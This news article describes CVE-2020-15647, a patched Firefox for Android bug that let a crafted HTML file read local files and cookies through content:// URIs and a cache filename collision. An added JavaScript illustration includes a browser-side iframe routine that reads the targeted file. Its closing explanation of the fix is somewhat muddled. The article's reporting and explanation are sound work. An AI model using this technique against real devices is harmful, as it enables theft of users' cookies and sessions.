Independent information security researcher Pedro Oliveira has published details of CVE-2020-15647, a bug he discovered this spring in Firefox for Android. Using a specially crafted HTML file, an attacker could steal cookies from the victim's device.
The vulnerability lay in the way Firefox handled local files referenced through content:// URIs. Exploiting it allowed an attacker to remotely obtain copies of cookies from the device, which gave access to some of the sites the user was logged in to.
To exploit the problem, an attacker had to convince the user to open a specially prepared HTML file. The malicious file loaded an iframe pointing at the content:// URI for profiles.ini, the file that records the Firefox user's profile directory (the directory in which the cookies database is kept). Because Firefox handled the URI incorrectly, the researcher was able to obtain a copy of this local file, which should never be readable by a web page.
The researcher explains that, in order to access a local file on the device, the browser first saved a copy of the resource behind the content:// URI in a private cache directory and then redirected to a file:// URI pointing at that copy.
“These content:// URIs require read and write permissions to be available to other applications. When you share a URI between apps (for example, via Share with), the source app must provide permissions for that URI (before sharing). As a result, the URI has permissions when it is shared with the receiving application, and only that application can access it. However, when the application itself processes its URIs (and not other applications), these permissions are not applied, which means that the application can freely access the content,” says Oliveira, noting that any file downloaded by Firefox prior to version 68.10.1 was processed in this way.
Because the attacker's HTML file and the local file the exploit requests carry the same file name, the copy Firefox makes for the iframe lands at the same path in the private cache directory, overwriting the cached copy of the malicious page while that page is still open in the browser. Once the iframe has loaded, it is served from the same file:// path as the attacker's page, so the two documents are same-origin: the page can read the iframe's contents and send them to the attacker. Since neither the path nor the origin has changed, the browser displays no warning.
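The following is an added illustration of the mechanism just described; it is not code from Oliveira's write-up or from Firefox. The first part models the pre-fix behaviour (a content:// URI is copied into a private cache directory under its last path segment and loaded as file://), and shows the precondition the attack relies on: the attacker's page and the requested file must share a basename so that the copy lands at the page's own file:// URL. The cache directory, the content provider authority and the file names in the sample are assumptions chosen for illustration. The last function is the browser-side part and does nothing outside a browser.

```javascript
// Added example, not code from Oliveira's write-up or from Firefox.
// Models the pre-68.10.1 behaviour the article describes: Firefox copied the
// target of a content:// URI into a private cache directory under the URI's
// last path segment and then loaded that copy as a file:// URL.
// The cache directory below is an assumption for illustration only.
const CACHE_DIR = "/data/data/org.mozilla.firefox/cache/contentUri";

// Last path segment of a URI with percent-encoding removed, e.g. "cookies.sqlite".
function basenameOf(uri) {
  const path = uri.split("?")[0].split("#")[0];
  const last = path.substring(path.lastIndexOf("/") + 1);
  return decodeURIComponent(last);
}

// The file:// URL that the cached copy of `contentUri` would be loaded from.
function cachedFileUrlFor(contentUri) {
  if (!contentUri.startsWith("content://")) {
    throw new Error("not a content:// URI: " + contentUri);
  }
  return "file://" + CACHE_DIR + "/" + basenameOf(contentUri);
}

// The precondition for the attack: the attacker's HTML page, already open from
// the cache, has the same basename as the file the iframe asks for, so the
// fresh copy overwrites it at the page's own file:// URL and is same-origin.
function sameOriginCollision(pageFileUrl, contentUri) {
  return cachedFileUrlFor(contentUri) === pageFileUrl;
}

// Browser-only part (returns null under Node): the steps from the article.
// The iframe requests the content:// URI; once the copy has replaced the cached
// page at the same path, the parent reads the iframe's document and hands the
// text to the caller. The content:// authority is whatever the caller supplies.
function readViaIframe(contentUri, onText) {
  if (typeof document === "undefined") return null;
  if (!sameOriginCollision(document.location.href, contentUri)) {
    throw new Error("page filename must match the target's basename");
  }
  const frame = document.createElement("iframe");
  frame.addEventListener("load", () => {
    onText(frame.contentDocument.documentElement.textContent);
  });
  frame.src = contentUri;
  document.body.appendChild(frame);
  return frame;
}

// Constructed sample input (not a real provider): a target file and the page
// that would have to be named after it for the collision to occur.
const SAMPLE_TARGET = "content://example.provider/files/cookies.sqlite";
const SAMPLE_PAGE = "file://" + CACHE_DIR + "/cookies.sqlite";
```

The fix in 68.10.1 removes the precondition rather than the collision: once the browser no longer serves its own cached copies under its own permissions, a page loaded from the cache cannot cause a second file to be written to the same path, and `sameOriginCollision` never becomes true for a file the page should not see.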
The vulnerability was fixed this summer in Firefox for Android 68.10.1.